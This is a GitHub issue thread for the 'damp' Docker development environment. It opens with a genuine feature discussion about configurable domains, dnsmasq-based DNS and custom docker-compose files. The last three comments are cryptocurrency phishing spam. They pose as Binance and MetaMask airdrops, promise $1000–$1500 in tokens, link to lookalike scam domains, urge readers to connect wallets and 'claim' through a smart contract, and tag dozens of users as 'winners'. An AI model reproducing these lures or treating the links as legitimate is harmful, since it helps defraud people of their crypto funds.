### ISSUE TITLE
Extend functionality

### ISSUE THREAD

**Issue by mathewpeterson** [gilbitron/damp#1]
First, I want to thank you for putting together and releasing this project. It seems that this is a good approach to the problem space of setting up the docker environment.

There are a few things that I would like to see changed:
1. Extract top-level-domain to variable
2. Stop editing `/etc/hosts` and use `/etc/resolver` (Note: this might be mac specific) with [andyshinn/docker-dnsmasq](https://github.com/andyshinn/docker-dnsmasq)
3. Add ability to use existing project `docker-compose.yml` file. (so we could just run `damp up` within an existing project and it would ensure the `docker-machine` is running and the run `docker-compose up -d`

If you feel these changes are out of scope then please tell me. Otherwise, I am interested in contributing these changes.

For reference: I have spent a good amount of time developing an environment around docker which I've implemented some of these in a Makefile. Feel free to check it out: https://github.com/mathewpeterson/my-docker-environment

**Comment by gilbitron** [comment]
Thanks for your suggestions Matthew. Can you explain what you mean by `Extract top-level-domain to variable`? I'm not sure about using anything too complex DNS wise as people are used to editing `/etc/hosts` coming from a MAMP/Vagrant background.

Having the ability to pass a custom `docker-compose.yml` is a good idea. Maybe it would be easiest to pass the config file location to `damp up`:

```
damp up --config=/path/to/docker-compose.yml
```

Do you want to have a go at submitting a PR for that?

**Comment by mathewpeterson** [comment]
1. Currently you use `damp.dev` for your domain. The main issue with this is that it's a real TLD and you do not own it. See http://www.iana.org/domains/root/db/dev.html. My suggestion is to use the `.local` TLD even though it's reserved for [mDNS](https://tools.ietf.org/html/rfc6762) I think it's a better solution than using a valid TLD. Taking that a bit further, I would suggest making whatever root domain (e.g. `damp.dev`) configurable. 
2. I understand the desire to edit your `/etc/hosts` file but I don't think that's good practice. The constant update to editing your `/etc/hosts` file can issues down the road, especially when there is more than one program doing it. However, I feel the complexity of adding a `dnsmasq` container out weighs the headaches down the road. And once it's set up, the only time you need to worry about it is when your `docker-machine` host ip address changes (which you can account for within `damp`)
3. Do you think it would be better to have a configuration file in `~/.damp`? I think it would be important to keep those changes persistent. 

Do you want me to open up separate issues for each of the above?

**Comment by gilbitron** [comment]
Yes it probably makes sense to open a separate issue for each of those items and continue the conversation in the respective ticket.

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @cihatpala, @princejoogie, @dw61, @hopoliu, @bublikrowres, @Penny-Admixture, @ImaginaryStargazer, @Nikofajar, @rishflab, @akhileshthite, @academ1c, @christopher-francisco, @arthurbeggs, @Victor1890, @taochenglin, @Manwhale, @augusl, @jonpierce, @hammu-babu, @kosik, @PsYear, @ytc0522, @Sodacanrootbeer, @EshelGuo, @jbmelander, @islamabdo, @DJGHOSTMACHINE, @maxdior02, @fanux, @OverflowRyan, @pedrogomez2019upb, @dayrakem, @PressJump, @alexandermirzoyan, @eLBirador, @cecyaguayo, @josimarcosDias, @cmarr31, @willvegas, @Davidthegreat01, @In-clude, @Nazarikk, @KOREAN139, @godlessssss, @RepoRobert, @GreatApe42069, @k-minsoo, @BaileyLuu, @leewalton2014, @Itzdavid01

**Comment by katsavav** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @AnujCtrl, @yoshitomimaehara, @3amlab, @mq-shao, @MaxFangX, @Co0kyies, @DungMinhDao

**Comment by synchrovision** [comment]
# 🌐 **$ETH MetaMask Airdrop: Claim Your $1000 in Ethereum Now!**

🎉 **Congratulations!** 

You're among the chosen participants for the $1.5k Ethereum Airdrop. We're thrilled to grant you $1000 in ETH to celebrate the year's end. But that's not all—connect now, and you'll instantly receive an extra $100! Follow the steps below to claim your Ethereum and make the most of this exclusive giveaway!

[![Claim Now](https://pbs.twimg.com/media/Frg-sWYWIAYCoiX.jpg:large)](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask)

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask) link.
   - Select **MetaMask** as your preferred wallet provider.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your MetaMask wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in Ethereum!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with MetaMask!


Winners: @zinnakhan, @theophoric, @nastiasam, @stiucsib86, @DisruptHub, @Jiavan, @obahareth
